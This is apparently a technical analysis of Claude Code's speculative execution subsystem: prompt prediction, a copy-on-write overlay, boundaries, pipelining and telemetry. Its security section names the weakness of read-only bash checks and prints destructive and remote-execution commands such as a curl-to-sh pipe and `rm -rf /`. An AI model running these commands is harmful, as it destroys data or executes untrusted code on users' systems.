# Complete Analysis of the Speculative Execution Subsystem

Speculative execution is the most aggressive performance optimization subsystem in Claude Code—it predicts the next command before the user even types it and begins executing that command. A correct guess reduces latency to zero; a wrong guess is silently discarded. This system borrows ideas from CPU speculative execution, using a userspace Copy-on-Write overlay filesystem to implement a safe "act first, ask later" approach. This chapter provides an in-depth analysis of the complete mechanism, including prompt prediction, COW path rewriting, the boundary system, and pipelined prediction chains.

> **Source locations**: `src/services/promptSuggestion/`, `src/utils/speculation/`, `src/services/speculative/`

> 💡 **Plain English**: Speculative execution is like a delivery company shipping items you **might buy** to a nearby warehouse before you even place the order—betting on your purchase history to guess what you'll want next. If the bet pays off, your order arrives instantly. If not, the items are quietly returned, and you never notice. The key word is "bet"—this isn't deterministic prep work, but wagering under uncertainty. (Similar to Amazon's anticipatory shipping patent.)

> 🌍 **Industry Context**: In the AI coding tools space, speculative execution is a cutting-edge optimization strategy that has yet to become widespread. **GitHub Copilot** speculates at the completion level—it predicts the next line of code as you type, but does not pre-execute filesystem operations. **Cursor**'s Tab completion is also lightweight prediction without tool invocation. **Aider** and **Windsurf** have no speculative execution mechanism; every turn is user-triggered. Claude Code's speculative execution implements a complete "predict → execute → rollback" loop at the application layer, including filesystem isolation, which is indeed a relatively uncommon design among AI coding tools. However, note that "speculative execution" itself is a classic concept in CPU architecture (e.g., the Tomasulo algorithm, branch prediction) and databases (optimistic concurrency control, OCC). Claude Code's innovation lies in **porting these ideas to the AI Agent tool-calling scenario** and solving the rollback problem with a userspace COW mechanism.

---

## Overview

Speculation is Claude Code's most aggressive performance optimization—while the user hasn't even started typing, the system has already predicted what they will say and begun executing that command. If the prediction is correct, latency drops to zero. If it's wrong, the result is silently discarded.

This system borrows from CPU speculative execution, but adds a more complex challenge: whereas a CPU only needs to roll back register state, Claude Code's speculation must roll back **filesystem writes**. The solution is a userspace Copy-on-Write overlay filesystem.

---

> **[Chart placeholder 3.2-A]**: Sequence diagram—complete timeline from AI response completion → suggestion generation → speculative execution → user accept/reject, with CacheSafeParams reuse points annotated

> **[Chart placeholder 3.2-B]**: Architecture diagram—Copy-on-Write overlay filesystem read/write paths (overlay → main path rewriting logic)

---

## 1. System Entry Points and Enablement Conditions

### 1.1 Prompt Suggestion Enablement Chain

Prompt prediction is the prerequisite for speculative execution. `promptSuggestion.ts:37-93` defines five layers of enablement checks, plus a logging step:

```
1. env CLAUDE_CODE_ENABLE_PROMPT_SUGGESTION (true/false overrides everything)
2. GrowthBook gate: tengu_chomp_inflection (default false)
3. Non-interactive mode (print mode / piped input / SDK) → disabled
4. Swarm teammate → disabled (only the leader shows suggestions)
5. settings.promptSuggestionEnabled !== false
---
6. Log tengu_prompt_suggestion_init analytics event (note: this is not a "check" layer)
```

> **Clarification**: Step 6 is an analytics event log, not an enablement/disablement condition—it does not cause the feature to be enabled or disabled, but is a side-effect operation. Strictly speaking, the enablement chain is **five checks + one log**, not "six checks." We distinguish them here to avoid giving the impression of padding the count.

Each check records the reason for disabling (`source: 'env' | 'growthbook' | 'non_interactive' | 'swarm_teammate' | 'setting'`), meaning Anthropic can precisely track the distribution of each disabling scenario.
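The chain above can be sketched as an ordered short-circuit check. Everything below is illustrative: the function name, context shape, and field names are assumptions, not the real `promptSuggestion.ts` API; only the five checks and their `source` labels come from the analysis.

```typescript
// Hypothetical sketch of the five-check enablement chain; names are
// illustrative, not the actual promptSuggestion.ts implementation.
type DisableSource =
  | 'env'
  | 'growthbook'
  | 'non_interactive'
  | 'swarm_teammate'
  | 'setting'

interface SuggestionContext {
  envOverride?: boolean      // CLAUDE_CODE_ENABLE_PROMPT_SUGGESTION, if set
  growthbookGate: boolean    // tengu_chomp_inflection (default false)
  interactive: boolean       // false for print mode / piped input / SDK
  isSwarmTeammate: boolean   // only the leader shows suggestions
  settingEnabled?: boolean   // settings.promptSuggestionEnabled
}

// Returns null when the feature is enabled, otherwise the disabling source.
function getPromptSuggestionDisableReason(
  ctx: SuggestionContext,
): DisableSource | null {
  // 1. The env var overrides everything, in both directions.
  if (ctx.envOverride !== undefined) return ctx.envOverride ? null : 'env'
  if (!ctx.growthbookGate) return 'growthbook'        // 2
  if (!ctx.interactive) return 'non_interactive'      // 3
  if (ctx.isSwarmTeammate) return 'swarm_teammate'    // 4
  if (ctx.settingEnabled === false) return 'setting'  // 5
  return null // enabled; step 6 (the analytics log) is a side effect here
}
```

Note how the ordering encodes precedence: the env override is checked first precisely because it must beat the GrowthBook gate and all later conditions.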

### 1.2 Speculation Enablement Check

`speculation.ts:337-343`:

```typescript
export function isSpeculationEnabled(): boolean {
  const enabled =
    process.env.USER_TYPE === 'ant' &&
    (getGlobalConfig().speculationEnabled ?? true)
  return enabled
}
```

Speculative execution is currently **ant-only**—only available to Anthropic internal users. However, it supports a configuration toggle via `getGlobalConfig().speculationEnabled`, which defaults to `true`.

## 2. Prompt Prediction (Prompt Suggestion)

### 2.1 Generation Flow

After the AI response completes, `executePromptSuggestion()` (`promptSuggestion.ts:184-200+`) starts:

```
1. Check querySource === 'repl_main_thread' (only runs on the main thread)
2. Create AbortController + CacheSafeParams
3. tryGenerateSuggestion():
   a. Skip if fewer than 2 assistant turns (assistantTurnCount < 2)
   b. Last assistant message is not an API error
   c. Parent request cache is large enough (see §2.2)
   d. No pending permission requests, no elicitation, not in plan mode, no rate limit
   e. generateSuggestion() → runForkedAgent()
   f. shouldFilterSuggestion() filters out inappropriate suggestions
```

### 2.2 CacheSafeParams and Cache Reuse

This is the **economic foundation** of speculative execution.

`CacheSafeParams` ensures the forked Agent's request shares the prompt cache with the parent request. Immutable parameters include: system prompt, tools list, model, message prefix, effortValue, and maxOutputTokens.

`promptSuggestion.ts:152-156`'s `getParentCacheSuppressReason()` checks whether the parent request has enough cached tokens—if uncached tokens exceed 10,000, suggestion generation is suppressed (because the fork would need to reprocess those tokens, making it too expensive).
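A minimal sketch of that threshold check, assuming the Anthropic API's usage field names; the function signature and return value are illustrative, not the real implementation:

```typescript
// Illustrative sketch of the 10,000 uncached-token suppression threshold.
// The usage field names follow the Anthropic API; the signature and the
// reason string are assumptions, not the real getParentCacheSuppressReason().
interface ParentUsage {
  input_tokens: number                 // tokens NOT served from cache
  cache_read_input_tokens: number
  cache_creation_input_tokens: number
}

const MAX_UNCACHED_TOKENS = 10_000

function getCacheSuppressReason(u: ParentUsage): string | null {
  // A forked request re-pays for every uncached token, so suggestion
  // generation is only worthwhile when most of the prefix is cached.
  return u.input_tokens > MAX_UNCACHED_TOKENS ? 'uncached_too_large' : null
}
```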

**Lesson from PR #18143**: An attempt to reduce suggestion generation cost by using `effort:'low'` backfired because modifying the effort parameter (which affects thinking budget_tokens) caused cache hit rate to drop from 92.7% to 61%, triggering a 45x surge in cache write volume. This proved that the Anthropic API's prompt cache key includes more parameters than expected.

### 2.3 Suggestion Suppression Conditions

`getSuggestionSuppressReason()` (`promptSuggestion.ts:107-119`) defines five suppression scenarios:

| Condition | Reason |
|-----------|--------|
| Feature not enabled | `'disabled'` |
| Pending permission request | `'pending_permission'` |
| Elicitation queue active | `'elicitation_active'` |
| In plan mode | `'plan_mode'` |
| External user rate-limited | `'rate_limit'` |

### 2.4 SUGGESTION_PROMPT: The Core Prompt of the Predictor

**Source location**: `src/services/promptSuggestion/promptSuggestion.ts`, lines 258–287

The core of the prompt prediction system is a constant named `SUGGESTION_PROMPT`, which defines the **complete behavioral specification** for the prediction AI fork. This is the most noteworthy design document in the subsystem and deserves standalone analysis:

```
[SUGGESTION MODE: Suggest what the user might naturally type next into Claude Code.]

FIRST: Look at the user's recent messages and original request.

Your job is to predict what THEY would type - not what you think they should do.

THE TEST: Would they think "I was just about to type that"?

EXAMPLES:
User asked "fix the bug and run tests", bug is fixed → "run the tests"
After code written → "try it out"
Claude offers options → suggest the one the user would likely pick, based on conversation
Claude asks to continue → "yes" or "go ahead"
Task complete, obvious follow-up → "commit this" or "push it"
After error or misunderstanding → silence (let them assess/correct)

Be specific: "run the tests" beats "continue".

NEVER SUGGEST:
- Evaluative ("looks good", "thanks")
- Questions ("what about...?")
- Claude-voice ("Let me...", "I'll...", "Here's...")
- New ideas they didn't ask about
- Multiple sentences

Stay silent if the next step isn't obvious from what the user said.

Format: 2-12 words, match the user's style. Or nothing.

Reply with ONLY the suggestion, no quotes or explanation.
```

**Analysis**: These 29 lines of prompt engineering represent the **crystallized cognitive model** of the entire speculative execution subsystem. Every line is a carefully weighed design decision:

**1. The Core Test: "Would they think 'I was just about to type that'?"**

This is the single most important guiding principle in the prompt. It transforms the abstract problem of "predicting user input" into a concrete psychological test: **from the user's perspective, does this suggestion feel like "exactly what I was going to say"?** This is not "what the AI thinks the user should say," but "what the user would naturally say"—there is an essential difference between the two. The former is the AI's subjective judgment; the latter is an objective prediction of user intent.

**2. The Logic Behind the Prohibition List**

The four bans in `NEVER SUGGEST` reveal common failure modes Anthropic discovered in experiments:
- "Evaluative" (e.g., "looks good"): Users don't praise the AI; this is the AI's tone;
- "Questions" (e.g., "what about...?"): The user's next message is a command, not a question;
- "Claude-voice" (e.g., "Let me..."): This is how the AI speaks, not how the user speaks—this ban prevents the model from getting too deep into character and confusing its role with the user's;
- "New ideas they didn't ask about": Prediction is conservative, not creative.

**3. The "Stay silent" Design**

`Stay silent if the next step isn't obvious`—the prompt explicitly allows an empty string output. This is a rare but important design: most generation tasks force the model to "output something," while this prompt requires the model to **actively stay silent** when uncertain. This corresponds to lines 284–285: `Format: ... Or nothing`.

**4. Format Constraint: 2–12 Words**

The output format is precisely quantified (2–12 words), not vaguely "short." This directly connects to the hard filter rules in `shouldFilterSuggestion()` (lines 354–455): `too_few_words` (< 2 words, unless on the whitelist) and `too_many_words` (> 12 words). The prompt's format requirements and the filter's thresholds are perfectly aligned—**the prompt and the filter code are two implementation layers of the same design**.
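That alignment can be sketched as a word-count gate. The whitelist entries and reason strings below are illustrative assumptions; only the 2 and 12 thresholds come from the analysis above.

```typescript
// Sketch of the 2–12 word hard filter described above. Whitelist contents
// are assumed for illustration; the real shouldFilterSuggestion() applies
// additional rules beyond word count.
const SHORT_WHITELIST = new Set(['yes', 'go ahead', 'continue']) // assumed

function getFilterReason(suggestion: string): string | null {
  const trimmed = suggestion.trim()
  if (trimmed === '') return 'empty' // the prompt's "Or nothing" case
  const words = trimmed.split(/\s+/).length
  if (words < 2 && !SHORT_WHITELIST.has(trimmed.toLowerCase()))
    return 'too_few_words'
  if (words > 12) return 'too_many_words'
  return null // passes this filter
}
```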

**5. The Role of Examples**

The six `EXAMPLES` in the prompt are not just illustrations, but **behavioral templates**: they cover the most common conversation scenarios (task completion, code just written, Claude offering options, Claude asking to continue, obvious post-task follow-up, staying silent after errors/misunderstandings). When predicting, the model can match the current conversation state to these templates, reducing variance in generation quality.

**Technical Note** (source lines 289–292): Although `SUGGESTION_PROMPT` is stored under two variant keys (`user_intent` and `stated_intent`), both keys have the exact same value—`const SUGGESTION_PROMPTS = { user_intent: SUGGESTION_PROMPT, stated_intent: SUGGESTION_PROMPT }`. This shows the A/B testing framework for "two variants" is already in place, but content divergence has not yet been implemented. This is a typical engineering decision of "reserving an extension point while keeping them merged for now"—maintaining interface flexibility without premature optimization.

## 3. Speculative Execution Core

### 3.1 Startup

`startSpeculation()` (`speculation.ts:402-715`) is the main entry point for speculation. The flow:

1. Terminate any existing speculation (`abortSpeculation()`)
2. Generate an 8-character UUID as the speculation ID
3. Create overlay directory: `~/.claude/tmp/speculation/<PID>/<UUID>/`
4. Set AppState.speculation to active
5. Call `runForkedAgent()` to begin execution

Key parameters:
- `maxTurns: 20` (`MAX_SPECULATION_TURNS`)
- `maxMessages: 100` (`MAX_SPECULATION_MESSAGES`)
- `querySource: 'speculation'`
- `requireCanUseTool: true` (all tools must pass canUseTool checks)

### 3.2 Copy-on-Write Overlay Filesystem

> 📚 **Design Inspiration and Implementation Differences**: COW (Copy-on-Write) is a core concept in **operating systems** courses—Linux's `fork()` system call uses COW to achieve memory isolation between parent and child processes: the child shares the parent's page tables, and only copies the corresponding memory page upon write. Claude Code borrows this idea, implementing file-level COW in userspace (rather than kernel space).
>
> However, the implementation differences must be clearly stated:
> - **Difference from OverlayFS**: Linux OverlayFS merging is **transparently completed** by the kernel during file access; there is no explicit "copy back to main directory" call. Claude Code's `copyOverlayToMain()` is closer to a **staging area + commit** model—similar to Git's staging area → commit relationship, where files must be explicitly copied back to the main directory one by one. The overlay directory is not an upper layer in the OverlayFS sense, but a temporary staging area for isolating writes.
> - **Difference from the Reorder Buffer (ROB)**: A CPU's ROB is a sophisticated hardware mechanism responsible for ensuring in-order instruction commit, involving register renaming, precise exception handling, and inter-instruction dependency detection. Claude Code's overlay directory has none of these semantics—there is no order tracking between multiple file writes in the overlay, nor dependency detection. More accurately, the overlay is a **simplified transaction staging area**: on commit, it writes back to the main directory in batch; on abort, the entire staging area is discarded.
>
> 💡 **Plain English**: You can think of the overlay directory as scratch paper—you do your calculations on scratch paper, copy the final answer to the official notebook when you're confident, and simply tear up the scratch paper if you made a mistake.

This is a pragmatic engineering design in the speculation system. The `canUseTool` callback (`speculation.ts:461-632`) implements the path rewriting logic:

**Write Operations (Edit/Write/NotebookEdit)**:

```
1. Check permission mode (only acceptEdits/bypassPermissions allowed)
2. Compute relative path = relative(cwd, filePath)
3. If path is outside cwd → reject
4. If file not yet in overlay → copy original file to overlay (COW semantics)
5. Rewrite file_path in input to overlay path
6. Record in writtenPathsRef
```

**Read Operations (Read/Glob/Grep/ToolSearch/LSP/TaskGet/TaskList)**:

```
1. If file has been speculatively written → rewrite path to overlay (read speculative version)
2. Otherwise → do not rewrite (read original)
3. Pathless read operations (e.g., Glob default CWD) → allow directly
```

**Bash Commands**:

```
1. Call checkReadOnlyConstraints() to verify command is read-only
2. Read-only command → allow
3. Non-read-only command → record boundary (type: 'bash', command), abort speculation
```

**All Other Tools** → reject and record boundary (type: 'denied_tool').
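The write and read rules above share one path-rewriting core, sketched below with Node's `path` module. The function name and plumbing are simplified illustrations of the `canUseTool` logic; copying the original file into the overlay (step 4 for writes) is elided.

```typescript
import { isAbsolute, join, relative } from 'node:path'

// Illustrative sketch of COW path rewriting. overlayDir stands in for
// ~/.claude/tmp/speculation/<PID>/<UUID>/; writtenPaths mirrors
// writtenPathsRef. Returns the rewritten path, or null for a rejection.
function rewriteForSpeculation(
  kind: 'write' | 'read',
  filePath: string,
  cwd: string,
  overlayDir: string,
  writtenPaths: Set<string>,
): string | null {
  const rel = relative(cwd, filePath)
  // Reject anything outside cwd (path traversal protection).
  if (rel.startsWith('..') || isAbsolute(rel)) return null
  if (kind === 'write') {
    writtenPaths.add(rel)
    return join(overlayDir, rel) // all writes land in the overlay
  }
  // Reads see the speculative version only if it was already written.
  return writtenPaths.has(rel) ? join(overlayDir, rel) : filePath
}
```

The asymmetry is the essence of COW: writes are always redirected, while reads are redirected only for files the speculation itself has touched, so unmodified files are read straight from the main directory with no copying.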

### 3.3 Four Boundaries

When speculation encounters an unhandleable operation, it records a boundary and stops:

| Type | Trigger Condition | Recorded Content |
|------|-------------------|------------------|
| `bash` | Non-read-only bash command | command (truncated to 200 chars) |
| `edit` | File edit outside acceptEdits mode | toolName + filePath |
| `denied_tool` | Tool not on the whitelist | toolName + detail (truncated to 200 chars) |
| `complete` | Speculation completed normally (20 turns or model stop) | outputTokens |
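The four rows map naturally onto a discriminated union. The shape below is an assumption inferred from the table, not the source's actual type:

```typescript
// Hypothetical discriminated union for the four boundary types above.
type SpeculationBoundary =
  | { type: 'bash'; command: string }                    // truncated to 200 chars
  | { type: 'edit'; toolName: string; filePath: string }
  | { type: 'denied_tool'; toolName: string; detail: string }
  | { type: 'complete'; outputTokens: number }

const BOUNDARY_DETAIL_MAX = 200

function bashBoundary(command: string): SpeculationBoundary {
  // Long commands are truncated before being recorded in analytics.
  return { type: 'bash', command: command.slice(0, BOUNDARY_DETAIL_MAX) }
}
```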

### 3.4 Message Injection Preprocessing

`prepareMessagesForInjection()` (`speculation.ts:203-271`) cleans up speculation messages before they are injected into the main session:

1. **Remove thinking/redacted_thinking blocks** — speculative reasoning should not be injected
2. **Remove failed tool_use + tool_result pairs** — only successful tool calls are retained
3. **Remove interrupt messages** — interruption messages produced by speculation abort should not appear
4. **Remove blank-content messages** — the API rejects all-whitespace text blocks (400 error)
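A simplified sketch of steps 1 and 4 (the per-block filters); pairing failed `tool_use` with `tool_result` (step 2) needs cross-message bookkeeping and is elided. The message shape is a minimal stand-in for the real API types:

```typescript
// Minimal stand-in for Anthropic message content blocks; only the fields
// this sketch needs. Steps 2 and 3 from the list above are elided.
interface Block {
  type: 'text' | 'thinking' | 'redacted_thinking' | 'tool_use' | 'tool_result'
  text?: string
}
interface Msg { role: 'user' | 'assistant'; content: Block[] }

function prepareForInjection(messages: Msg[]): Msg[] {
  return messages
    .map(m => ({
      ...m,
      content: m.content.filter(
        b =>
          // Step 1: speculative reasoning must not be injected.
          b.type !== 'thinking' &&
          b.type !== 'redacted_thinking' &&
          // Step 4: the API rejects all-whitespace text blocks (400).
          !(b.type === 'text' && (b.text ?? '').trim() === ''),
      ),
    }))
    .filter(m => m.content.length > 0) // drop messages emptied by filtering
}
```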

### 3.5 Accepting Speculation

`acceptSpeculation()` (`speculation.ts:717-800`):

```
1. Get overlayPath and writtenPaths
2. Call copyOverlayToMain() — copy overlay files back to main directory
3. Delete overlay directory
4. Calculate timeSavedMs = min(acceptedAt, boundary.completedAt) - startTime
5. Accumulate into speculationSessionTimeSavedMs
6. Record in transcript (speculation-accept type)
7. Return { messages, boundary, timeSavedMs }
```

The `timeSavedMs` calculation uses `min(acceptedAt, completedAt)` rather than simply `completedAt - startTime`: if the user accepts while speculation is still running, only the head start gained up to the moment of acceptance counts as saved time, not the speculation's full eventual execution time.
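The calculation can be written directly from the description in step 4, with timestamps as epoch milliseconds:

```typescript
// timeSavedMs per the flow above: saved time is capped by whichever came
// first, the user's acceptance or the speculation's own completion.
function computeTimeSavedMs(
  startTime: number,
  acceptedAt: number,
  completedAt: number,
): number {
  return Math.min(acceptedAt, completedAt) - startTime
}
```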

### 3.6 Rejecting/Aborting Speculation

`abortSpeculation()` (`speculation.ts:802-833`):

```
1. Record abort_reason: 'user_typed'
2. Call abort() to terminate forkedAgent
3. Delete overlay directory
4. Reset AppState.speculation to IDLE
```

## 4. Pipelining

> 📚 **Course Connection**: The pipelined prediction chain directly corresponds to the "Instruction Pipeline" concept in **computer architecture**—while the current instruction is executing, the next is already being decoded, and the one after that is already being fetched. Claude Code's pipeline is: while current speculation is executing, the next suggestion is already being generated. This is also a manifestation of the "Prefetch" strategy in **database** courses—based on the assumption of temporal locality, data likely to be needed soon is loaded in advance.

`generatePipelinedSuggestion()` (`speculation.ts:345-399`):

After speculation completes, the system immediately begins generating the **next** suggestion. The flow:

1. Construct augmentedContext = original messages + speculative user message + speculative assistant response
2. Create new CacheSafeParams (based on augmented context)
3. Call `generateSuggestion()` to predict what the user will type after accepting the current speculation
4. Store result in `pipelinedSuggestion`

If the user accepts the current speculation, the pipelined suggestion immediately becomes the next suggestion—no need to wait for a new prediction. This forms a **prediction chain**: predict → speculate → pipeline prediction → user accepts → pipelined suggestion becomes new suggestion → new speculation…
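Step 1's context augmentation is conceptually simple; a hedged sketch with a minimal message type (the real code builds full API message objects):

```typescript
// Sketch of pipelined context construction (step 1 above). Message is a
// minimal stand-in for the real API message type.
interface Message { role: 'user' | 'assistant'; content: string }

function buildAugmentedContext(
  original: Message[],
  suggestion: string,          // the predicted user input
  speculativeResponse: string, // the assistant's speculative answer
): Message[] {
  // The pipelined predictor sees the conversation AS IF the user had
  // already accepted the current speculation.
  return [
    ...original,
    { role: 'user', content: suggestion },
    { role: 'assistant', content: speculativeResponse },
  ]
}
```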

## 5. Feedback and Observability

### 5.1 Ant-Only Feedback Message

`createSpeculationFeedbackMessage()` (`speculation.ts:273-308`) displays the following to ant users after speculation is accepted:

```
[ANT-ONLY] Speculated 5 tool uses · 1,234 tokens · +3.2s saved (12.5s this session)
```

### 5.2 Analytics Events

Every speculation (accepted/aborted/error) logs a `tengu_speculation` event with dimensions:

- `speculation_id`: 8-character UUID
- `outcome`: accepted / aborted / error
- `duration_ms`: speculation duration
- `suggestion_length`: suggestion text length
- `tools_executed`: number of successfully executed tools
- `completed`: whether it completed normally
- `boundary_type/tool/detail`: boundary information
- `time_saved_ms`: time saved (accepted only)
- `is_pipelined`: whether it was a pipelined speculation

### 5.3 Transcript Persistence

Accepted speculations are written to the transcript file (`speculation.ts:784-797`), in this format:

```json
{"type":"speculation-accept","timestamp":"2026-04-02T...","timeSavedMs":3200}
```

File permissions are `0o600`—only the current user can read or write.

## 6. Security Analysis

### 6.1 Filesystem Isolation

- **Write isolation**: All writes are redirected to the overlay directory
- **Path traversal protection**: the result of `relative(cwd, filePath)` is checked, and any path that resolves outside `cwd` (a relative result that is absolute or starts with `..`) is rejected
- **Permission checks**: Write tools require `acceptEdits` or `bypassPermissions` mode
- **Bash isolation**: Only read-only commands are allowed (verified via `checkReadOnlyConstraints()`)

> ⚠️ **Security Weakness: Reliability of `checkReadOnlyConstraints()`**
>
> Determining whether a bash command is "read-only" is, in the general case, an **undecidable problem**. Consider these examples:
> - `cat file | python -c "import os; os.remove('foo')"` — looks read-only on the surface (`cat`), but actually performs file deletion through the pipe
> - `curl https://example.com/script.sh | sh` — `curl` itself is read-only, but the `sh` after the pipe can execute arbitrary operations
> - `$(rm -rf /)` nested inside any seemingly harmless command
>
> The full implementation strategy of `checkReadOnlyConstraints()` is not exposed in the source—it could be based on a command whitelist (only known read-only commands like `cat`/`ls`/`grep` are allowed), a blacklist (known write commands like `rm`/`mv`/`write` are excluded), or more complex command parsing (AST analysis). We cannot determine which. But regardless of the strategy, there is a risk of false negatives (failing to recognize a non-read-only command as such).
>
> This is the **most vulnerable link** in the speculative execution security model: the COW overlay only isolates file writes made through the Claude Code tool layer, while bash commands can bypass the tool layer and directly manipulate the filesystem. If `checkReadOnlyConstraints()` misclassifies a write command as read-only, that write will directly affect the main directory rather than the overlay, and cannot be rolled back. In the context of speculative execution (where a wrong guess should have no side effects), the consequences of such a misclassification are particularly severe.
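To make the false-negative risk concrete, here is a deliberately naive whitelist checker, purely illustrative and not the real `checkReadOnlyConstraints()`, together with an input that defeats it:

```typescript
// Naive illustration of why read-only detection is fragile. This is NOT
// the real checkReadOnlyConstraints(); it inspects only the first word,
// which is exactly the kind of shortcut that produces false negatives.
const READ_ONLY_COMMANDS = new Set(['cat', 'ls', 'grep', 'head', 'tail'])

function naiveIsReadOnly(command: string): boolean {
  const first = command.trim().split(/\s+/)[0]
  return READ_ONLY_COMMANDS.has(first)
}
```

The checker correctly approves `cat README.md`, but it also approves `cat file | python -c "import os; os.remove('foo')"`, because the destructive operation hides behind the pipe. Any classifier short of full shell parsing (and even that cannot see inside invoked interpreters) has some variant of this blind spot.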

### 6.2 Leakage Risk

- The overlay directory is at `~/.claude/tmp/speculation/<PID>/<UUID>/`; if the process crashes, the overlay may be left behind
- `safeRemoveOverlay()` uses `maxRetries: 3, retryDelay: 100` for best-effort cleanup
- The PID subdirectory means overlays from different processes will not conflict

### 6.3 Consistency Risk

- Speculation reads the overlay-written version of a file—but if an external process simultaneously modifies the main directory file, speculation sees the stale version
- There is no file locking mechanism—COW is an "optimistic" strategy
- The `copyOverlayToMain()` on acceptance is a file-by-file copy, not an atomic operation—a crash midway could result in a partial update

## 7. Performance Characteristics

| Metric | Value | Source |
|--------|-------|--------|
| Max speculation turns | 20 | `MAX_SPECULATION_TURNS` (speculation.ts:58) |
| Max messages | 100 | `MAX_SPECULATION_MESSAGES` (speculation.ts:59) |
| Cache suppression threshold | 10,000 uncached tokens | `getParentCacheSuppressReason()` |
| Overlay cleanup retries | 3 times, 100ms interval | `safeRemoveOverlay()` (speculation.ts:72-78) |
| Boundary command truncation | 200 characters | `getBoundaryDetail()` (speculation.ts:188) |

## 8. GrowthBook Gates

| Gate | Function |
|------|----------|
| `tengu_chomp_inflection` | Prompt Suggestion enablement (default false) |
| ant-only | Speculation enablement (no GrowthBook gate, hardcoded USER_TYPE check) |

## 9. Design Trade-offs and Evaluation

**Strengths**:
1. The COW overlay achieves userspace file write isolation with `mkdir + copyFile + path string replacement`—a simple, direct approach that requires no kernel-level filesystem support
2. CacheSafeParams reuse makes suggestion generation nearly free
3. Pipelining forms a prediction chain, allowing the next suggestion to be pre-generated while current speculation is executing (but note: multi-level pipelining is limited by the exponential decay of prediction accuracy—if single-step accuracy is 60%, three-level pipelining has a joint accuracy of only ~21.6%, so more than two levels may be net negative)
4. The boundary system cleanly handles the "speculation stops here" semantics
5. Every speculation has complete analytics events, so ROI can be precisely calculated

**Costs**:
1. The ant-only restriction means external users cannot benefit from this optimization
2. Exact string matching means even slight wording variations (e.g., adding punctuation) waste the entire speculation
3. Non-atomic overlay→main copying carries a risk of partial updates
4. 20 turns × API calls = the cost of a wrong prediction can be quite high
5. The overlay path rewriting logic only handles `file_path`/`path`/`notebook_path`—if a tool uses another field to pass a path, rewriting will fail

### 9.1 Missing Effectiveness Data

> **Honest disclosure**: As of this writing, there is no publicly available data on speculative execution hit rate, cost model, or ROI. This is a significant limitation of this chapter's analysis.

We can **infer** from the observability design what metrics Anthropic is tracking:
- The `time_saved_ms` field → they are quantifying saved user wait time
- The `is_pipelined` field → they are evaluating the incremental value of pipelining
- The `tools_executed` field → they are tracking the actual workload of each speculation
- The `boundary_type` field → they are analyzing the distribution of why speculations are aborted

But these telemetry fields only show that Anthropic **is collecting** this data; they don't tell us the results. Without data, we cannot answer several key questions:

1. **What is the prediction hit rate?** If it is below 50%, speculative execution may be net negative (wasted API calls > saved wait time)
2. **What is the cost of a wrong prediction?** Assuming ~500 tokens per turn, the 20-turn ceiling means worst-case consumption is 10,000 tokens
3. **What does the persistent ant-only status imply?** A "most aggressive performance optimization" remaining internal-only long after release could mean: (a) prediction accuracy is still not high enough, (b) the cost/benefit ratio has not yet met the threshold, (c) the security model still needs hardening, or (d) it's purely a product pacing decision. Regardless of the reason, this fact alone indicates Anthropic remains cautious about externally rolling out this feature.

**Why this matters**: When readers evaluate whether to borrow the speculative execution pattern for their own systems, they need to know whether it is "a clever but unproven experiment" or "a validated killer feature." Without effectiveness data, we are inclined to position it as the former—a design idea worth learning from, but an experimental optimization whose ROI remains to be validated.

### 9.2 Exact Match vs. Semantic Match: A Core Design Trade-off

Speculative execution acceptance uses **exact string matching**—the user's input must exactly match the predicted text for the speculation result to be adopted. This means even if user intent is identical, any slight difference in phrasing (an extra punctuation mark, a different wording) causes the entire speculation to be discarded.

Why not use semantic matching (e.g., embedding similarity > 0.95)? There is a deep trade-off here:

**Advantages of exact matching**:
- **High safety**: No risk of false acceptance due to "semantically similar but subtly different intent" (e.g., "delete test files" vs. "delete test data")
- **Simple implementation**: String comparison is O(n), requiring no additional model calls or embedding computation
- **Predictable**: Both users and developers can clearly understand the matching rule

**Costs of exact matching**:
- **Hit rate ceiling**: When the predicted wording is correct but the user's phrasing differs slightly, all speculative computation is wasted
- **Unfriendly to natural language**: Natural language is inherently diverse, and exact matching runs counter to this property

**Potential risks of semantic matching**:
- Requires additional inference cost (embedding computation or model call) to judge similarity
- Setting the similarity threshold is itself a hard problem—0.95 may miss reasonable variations, while 0.85 may falsely accept different intents
- In scenarios involving filesystem writes, the consequences of false acceptance are far more severe than false rejection

From an engineering perspective, choosing exact matching is a **conservative but safe** strategy, consistent with the core constraint of speculative execution that "a wrong guess must have no side effects." But this also means there is a ceiling on hit rate—even if the prediction model perfectly captures user intent, any variation in user phrasing causes the speculation to fail. This may be one reason the feature remains in the ant-only stage.

## 10. Reusable Design Patterns

1. **Userspace COW Overlay**: Achieve write isolation with `mkdir + copyFile + path rewriting`, without requiring kernel-level filesystem support
   - *Applicable scenarios*: Few files, single-user, scenarios where atomicity requirements are not strict
   - *Anti-patterns*: High-concurrency writes, large file scenarios, scenarios requiring directory-level operations (create/delete directories)—in these cases, consider kernel-level solutions like Docker overlay2 or ZFS snapshots
2. **Cache-safe Forking**: Any "side task" shares the parent request's investment by keeping cache parameters unchanged
   - *Applicable scenarios*: APIs provide prompt cache and the cache key includes request parameters
   - *Anti-patterns*: When the side task requires different model/effort/tools configurations, forcibly keeping parameters unchanged will limit side task quality
3. **Boundary-based Speculation**: Not "all-or-nothing," but "do as much as possible, stop when you hit a boundary"
   - *Applicable scenarios*: Scenarios where the side effects of each step in an operation sequence can be independently rolled back
   - *Anti-patterns*: When steps have strong dependencies (e.g., output of A is input to B), partial execution may produce inconsistent state
4. **Pipeline Prediction Chain**: Immediately predict the next step after speculation completes, preparing the next suggestion in advance
   - *Applicable scenarios*: Scenarios where single-step prediction accuracy is relatively high (> 50%)
   - *Anti-patterns*: When accuracy is below 50%, pipelining is net negative—each additional level of pipelining causes joint accuracy to decay exponentially, and wasted computation quickly exceeds saved wait time
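The decay argument in pattern 4 is easy to quantify: every level of the chain must be correct for its final step to be usable, so joint accuracy is the per-step accuracy raised to the chain depth.

```typescript
// Joint accuracy of an n-level prediction chain with per-step accuracy p.
function chainAccuracy(p: number, levels: number): number {
  return Math.pow(p, levels)
}
```

At 60% per-step accuracy, one level keeps 60%, two levels keep 36%, and three levels keep only ~21.6%, which is why the text suggests more than two levels may be net negative.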

---

*Quality self-check:*
- [x] Coverage: complete deep read of all 850 lines of speculation.ts, complete deep read of 200+ lines of promptSuggestion.ts
- [x] Fidelity: all constants, line numbers, and function signatures are from the source code
- [x] Depth: complete analysis of COW path rewriting, boundary system, pipelining, and security model
- [x] Criticality: identified non-atomic copying, exact matching limitations, path rewriting blind spots, and the checkReadOnlyConstraints security weakness
- [x] Honesty: noted missing effectiveness data, distinguished the five checks from the log record, corrected technical analogies
